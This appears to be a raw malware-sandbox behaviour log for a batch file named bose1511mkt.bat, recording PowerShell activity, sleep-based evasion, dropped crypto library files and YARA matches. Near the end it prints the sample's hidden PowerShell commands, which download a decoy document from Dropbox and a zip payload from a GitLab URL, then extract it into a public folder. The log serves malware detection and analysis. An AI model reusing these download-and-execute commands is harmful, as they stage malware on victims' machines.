            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3095Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6803Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5419Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1058Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3434Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6297Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3350Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6395Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_ocb.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_ARC4.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_aes.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_chacha20.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_ofb.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_ctr.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Crypto\Util\_strxor.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_arc2.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_blowfish.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_cbc.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_cfb.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\tcl\tix8.4.3\tix84.dllJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_cast.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Crypto\Util\_cpuid_c.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_pkcs1_decode.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_des.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_aesni.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_des3.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_ecb.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_Salsa20.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_eksblowfish.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5192Thread sleep count: 3095 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3804Thread sleep count: 6803 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5140Thread sleep time: -11068046444225724s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3268Thread sleep count: 5419 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3916Thread sleep count: 1058 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7040Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4776Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1924Thread sleep count: 3434 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1668Thread sleep count: 6297 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1340Thread sleep time: -19369081277395017s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3908Thread sleep count: 3350 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3908Thread sleep count: 6395 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6720Thread sleep time: -20291418481080494s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: powershell.exe, 0000000C.00000002.2249574202.000001F136EAD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2470819762.0000019DFB282000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: powershell.exe, 0000000E.00000002.2470819762.0000019DFB282000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: Yara matchFile source: amsi64_5176.amsi.csv, type: OTHER
            Source: Yara matchFile source: amsi64_6452.amsi.csv, type: OTHER
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5176, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6452, type: MEMORYSTR
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe fIndJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\Desktop\bose1511mkt.bat"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\Desktop\bose1511mkt.bat"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\Desktop\bose1511mkt.bat"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\Desktop\bose1511mkt.bat"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe fINdJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1', 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx')"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bose1511/mkt1511/-/raw/main/16Fukrun.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_advertising_campaign_and_collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1', 'c:\users\user\appdata\local\temp\\16_advertising_campaign_and_collaboration.docx')"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://gitlab.com/bose1511/mkt1511/-/raw/main/16fukrun.zip', 'c:\users\public\document.zip')"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_advertising_campaign_and_collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1', 'c:\users\user\appdata\local\temp\\16_advertising_campaign_and_collaboration.docx')"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://gitlab.com/bose1511/mkt1511/-/raw/main/16fukrun.zip', 'c:\users\public\document.zip')"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
